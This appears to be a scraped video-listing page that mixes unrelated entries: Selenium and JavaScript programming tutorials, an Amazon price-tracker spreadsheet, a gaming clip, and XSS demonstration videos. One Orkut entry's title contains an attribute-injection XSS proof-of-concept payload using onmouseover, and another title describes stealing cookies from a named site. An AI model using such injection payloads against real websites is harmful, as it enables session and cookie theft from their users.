No commentary Over watch Competitive. Pre-tournament training and climbing to 70. ► Current Rank http://masteroverwatch.com/profile/shared/0a2fd3d5b21b21ac ► TWITCH https://www.twitch.tv/alyssa_gryphon -~-~~-~~~-~~-~- Please watch: "[No Commentary] Competive Overwatch Vod #2" https://www.youtube.com/watch?v=Pf0HxBOylcI -~-~~-~~~-~~-~-
XSS (Cross Site Scripting) Stealing a cookie Kitabisa.com

Channel Title : Richie Daniel

Views : 281

Likes : 0

DisLikes : 0

Published Date : 2018-11-29T06:40:08.000Z

Ellusionist HTML Injection + Persistent XSS

Channel Title : Spade

Views : 51

Likes : 1

DisLikes : 0

Published Date : 2017-03-04T06:15:30.000Z

Selenium with C# 51 - IJavaScriptExecutor interface | How to execute JavaScript from Selenium

Channel Title : Ankpro Training

Views : 475

Likes : 9

DisLikes : 0

Published Date : 2018-12-07T03:00:01.000Z

Javascript executor
IJavascript Interface
Alert using JavascriptExecutor
Refresh the page using JavascriptExecutor
Handle checkbox using JavascriptExecutor
InnerText using JavascriptExecutor
Get the Title of a page using JavascriptExecutor
Get a domain of a page using JavascriptExecutor
Get a URL of a page using JavascriptExecutor
How to scroll a page using JavascriptExecutor
How to navigate to other page using JavascriptExecutor
Type text of JavascriptExecutor
How to get height and width of a page using JavascriptExecutor

What is JavaScript?
JavaScript is the preferred language inside the browser to interact with HTML dom. This means that a Browser has JavaScript implementation in it and understands the JavaScript commands.

What is IJavaScriptExecutor?
IJavaScriptExecutor is an Interface that helps to execute JavaScript through Selenium Webdriver. IJavaScriptExecutor provides two methods "executescript" & "executeAsyncScript" to run JavaScript on the selected window or current page.

Alert Pop Window
We can create the alert pop-up using the following code
((IJavaScriptExecutor)driver).ExecuteScript("alert('Hello')");

To Refresh The Page
We can refresh the page by using following code
((IJavaScriptExecutor)driver).ExecuteScript("history.go(0)");

To Handle Checkbox
To make the checkbox checked
((IJavaScriptExecutor)driver).ExecuteScript("document.querySelectorAll('input[value = read]')[0].click()");
To make the checkbox unchecked
((IJavaScriptExecutor)driver).ExecuteScript("document.querySelectorAll('input[value = read]')[0].click()");

To Get The Inner Text
We can get the inner text of page by using following code
((IJavaScriptExecutor)driver).ExecuteScript("return document.documentElement.innerText;").ToString();

To Get The Title Of Page
We can get title of page by using following code
((IJavaScriptExecutor)driver).ExecuteScript("return document.title;").ToString();

To Get The Domain Of Page
We can get Domain of page by using following code
((IJavaScriptExecutor)driver).ExecuteScript("return document.domain;").ToString();

To Get The URL Of Page
We can get URL of page by using following code
((IJavaScriptExecutor)driver).ExecuteScript("return document.URL;").ToString();

To Scroll The Page
To scroll the page vertically for 500px we use the following code
((IJavaScriptExecutor)driver).ExecuteScript("window.scrollBy(0,500)");
To scroll the page vertically till the end we use following code
((IJavaScriptExecutor)driver).ExecuteScript("window.scrollBy(0,document.body.scrollHeight)");

To navigate other page
We can navigate to other page by using following code
((IJavaScriptExecutor)driver).ExecuteScript("window.location='http://uitestpractice.com'");

To Get The Height And Width of page
We can get the height and width of a page by using following code
((IJavaScriptExecutor)driver).ExecuteScript("return window.innerHeight;")
((IJavaScriptExecutor)driver).ExecuteScript("return window.innerWidth;")

To Type The Text
We can type the text into a text box by using following code
((IJavaScriptExecutor)driver).ExecuteScript("document.getElementById('Email').value='[email protected]';");

Possible Interview Questions on IJavaScriptExecutor
What is Javascript
What is IJavascriptExecutor
How to create alert using IJavaScriptExecutor
How to refresh the page using IJavaScriptExecutor
How to handle the checkbox using IJavaScriptExecutor
How to get the InnerText of javascript Executor
How to get the title of a page using IJavaScriptExecutor
How to get a domain of a page using IJavaScriptExecutor
How to get a URL of a page using IJavaScriptExecutor
How to scroll a page using IJavascriptExecutor
How to navigate to other page using IJavascriptExecutor
How to get the height and width of a page using IJavascript Executor
How to type text into text box using IJavaScriptExecutor

Code :
[TestMethod]
public void JavaScriptDemo()
{
    IWebDriver driver = new FirefoxDriver();
    driver.Url = "http://ankpro.com";
    //((IJavaScriptExecutor)driver).ExecuteScript("prompt('Hello')");
    //((IJavaScriptExecutor)driver).ExecuteScript("arguments[0].click();", "element");
    //((IJavaScriptExecutor)driver).ExecuteScript("history.go(0)");
    driver.Url = "http://uitestpractice.com/Students/Form";
    //((IJavaScriptExecutor)driver).ExecuteScript("document.getElementByValue('dance').checked=true;");
    // Toggle the checkbox whose value is "read"
    ((IJavaScriptExecutor)driver).ExecuteScript("document.querySelectorAll('input[value = read]')[0].click()");
    //String sText = ((IJavaScriptExecutor)driver).ExecuteScript("return document.documentElement.innerText;").ToString();
    //Console.WriteLine(sText);
    //String sText1 = ((IJavaScriptExecutor)driver).ExecuteScript("return document.title;").ToString();
    //Console.WriteLine(sText1);
    //String Text = ((IJavaScriptExecutor)driver).ExecuteScript("return document.domain;").ToString();
    //Console.WriteLine(Text);
    Thread.Sleep(2000);
    driver.Quit();
}
Amazon price alert Tracker in Google Sheets

Channel Title : Amarindaz

Views : 432

Likes : 4

DisLikes : 1

Published Date : 2018-11-22T17:27:07.000Z

Free Version: https://gum.co/QcHLA Premium Version: https://gum.co/dAQdA Blog Post: http://www.amarindaz.com/amazon-price-alert-tracker-google-sheets/ Free Version: https://gum.co/QcHLA Premium Version: https://gum.co/dAQdA Description: The prices of products listed on the Amazon shopping website vary every day and a simple Google Spreadsheet can help you keep the monitor and track these price fluctuations via email. Just add the items that you wish to buy from Amazon in a spreadsheet and it will send you an email alert when the product’s price drops on Amazon. You’ll thus never miss the deal again. ***How To Get Amazon Price Alert In Google Sheets? When you click on the link (either Freemium or Premium), you have popped up asking email ID to send the detailed document and Payment (only for premium) to complete the purchase. Once you are done, you can check your email for attachment with details to copy Amazon price tracker on your drive. Make sure that you have already logged in with your Gmail account so that you can make a copy of this Sheet to Google drive. Isn’t simple? Now go to Google drive and open the spreadsheet. ***How To Set Up Amazon Price Alert Tracker? There are a few things you need to do on the Spreadsheet before you put Amazon price alert to work. It’s very simple and just one-time setup. Here are the steps Go to the “Settings” tab. That’ll be the first sheet on the tracker. Enter your Name on B1 and enter email ID that you want to get price alert. Amazon price alert settings Now go to the ASIN tab. Enter the ASIN of the product that you want to monitor. ***What is ASIN? ASIN stands for Amazon Standard Identification Number. It’s a 10-character alphanumeric unique identifier that’s assigned by Amazon.com and its partners. It’s used for product-identification within Amazon.com organization. ***Where can I find the ASIN for my Products? It’s simple. Just go to this product and scroll down the Product information page. 
Otherwise, you can use the search option (Ctr l+ F) and type “ASIN” on your browser. You can find ASIN as shown below. Just copy and put it on Column A of ASIN tab. Amazon price alert finding ASIN Go to carts or wish list that contains the products you want to buy in future. You can copy those product ASINs and put it in the first column of ASIN tab. Finally, your sheet will look like below Amazon price tracker list You can find “Amazon price alert tracker” menu button. Click that and it’ll display drop down as shown below. Click the “First Run” option to initialize the script. Alternatively, you can also click on the button “Click here for the first-time run” in the ASIN tab. Amazon price tracker first Run Now, you need to give authorization by clicking continue button Price tracker authorize Select the Gmail account for authorization Select the Gmail account Sometimes, you’ll get pop up like this for verification as we are connecting to Amazon API (Google consider this as the third-party app). Click the advanced link and select “Go to APT” link. Verify the app Now you want to give access to the Script to connect with Amazon API, your Gmail for sending email on behalf of you to the Email ID entered in the settings tab and automatically run scripts every day on the server side. Click “Allow” to proceed further. Allow access to Amazon tracker That’s it, you are done! Your script will run for the first time and show you the results on the ASIN and for confirmation, you’ll get an email as well. From now onwards, everything is automated! It’ll track the price every day and send you an update. You can add/remove products when needed. 
********** Tutorial Playlists ********** Google apps script tutorial for beginners- https://goo.gl/wqHwqx Automate internet explorer with VBA- https://goo.gl/Xmy8Af Autoit tutorials for beginners- https://goo.gl/JHB1E2 Selenium Webdriver tutorials for beginners -https://goo.gl/QqxTrF ****** Contact me ******** Blog: http://www.amarindaz.com/contact/ FB page: http://www.facebook.com/amarindaz ******* Books written by me ******** Autoit tutorials for beginners: http://amzn.to/2GjaDbD Excel VBA for beginners: http://amzn.to/2nhI067 ******* Productivity tool ********* My Favorite YouTube Tools ➜ https://goo.gl/MX9Z4p and ➜https://goo.gl/UW1uRX ******* Gear Used To Shoot This Video ****** _Audio & Microphone http://amzn.to/2GibdGu ********Learning partner******** Video courses ➜https://click.linksynergy.com/fs-bin/click?id=832arX/53N8&offerid=323058.81&type=3&subid=0 Don't forget to subscribe! https://goo.gl/J2453w
Orkut - xss'onmouseover='alert(1)'// @ dekeeu %3C\x22

Channel Title : dekeeu

Views : 525

Likes : 3

DisLikes : 0

Published Date : 2014-10-02T16:45:43.000Z

Orkut - Orkut - xss"onmouseover="alert(1)"// @ dekeeu @ dekeeu
JavaScript substring example

Channel Title : kudvenkat

Views : 68423

Likes : 193

DisLikes : 4

Published Date : 2014-11-08T09:36:30.000Z

Link for all dot net and sql server video tutorial playlists http://www.youtube.com/user/kudvenkat/playlists
Link for slides, code samples and text version of the video http://csharp-video-tutorials.blogspot.com/2014/11/javascript-substring-example.html

In this video we will discuss a simple real time example of where we can use indexOf(), lastIndexOf() and substring() methods.

In the head section of the webform, include the following script section

function getEmailandDomainParts()
{
    var emailAddress = document.getElementById("txtEmailAddress").value;
    // Everything before the first "@" is the email part, everything after it is the domain part
    var emailPart = emailAddress.substring(0, emailAddress.indexOf("@"));
    var domainPart = emailAddress.substring(emailAddress.indexOf("@") + 1);
    document.getElementById("txtEmailPart").value = emailPart;
    document.getElementById("txtDomainPart").value = domainPart;
}

Finally set the onclick attribute of the button to call the JavaScript function

[input type="button" value="Get email & domain parts" style="width:250px" onclick="getEmailandDomainParts()"/]

In Part 11 of JavaScript Tutorial we discussed indexOf() function. lastIndexOf() is also very useful function for manipulating strings.

lastIndexOf() method returns the position of the last occurrence of a specified value in a string. Since its job is to return the last index of the specified value, this method searches the given string from the end to the beginning and returns the index of the first match it finds. This method returns -1 if the specified value is not present in the given string.

Example : Retrieve the last index position of dot (.) in the given string

var url = "http://www.csharp-video-tutorials.blogspot.com";
alert(url.lastIndexOf("."));

Output : 42

Simple real time example where lastIndexOf and substring methods can be used

In the head section of the webform, include the following script section

function getDomainName()
{
    var url = document.getElementById("txtURL").value;
    // Everything from the last dot onwards is the top level domain
    var domainName = url.substr(url.lastIndexOf("."));
    document.getElementById("txtDomian").value = domainName;
}

Finally set the onclick attribute of the button to call the JavaScript function

[input type="button" value="Get top level domain" style="width: 300px" onclick="getDomainName()" /]
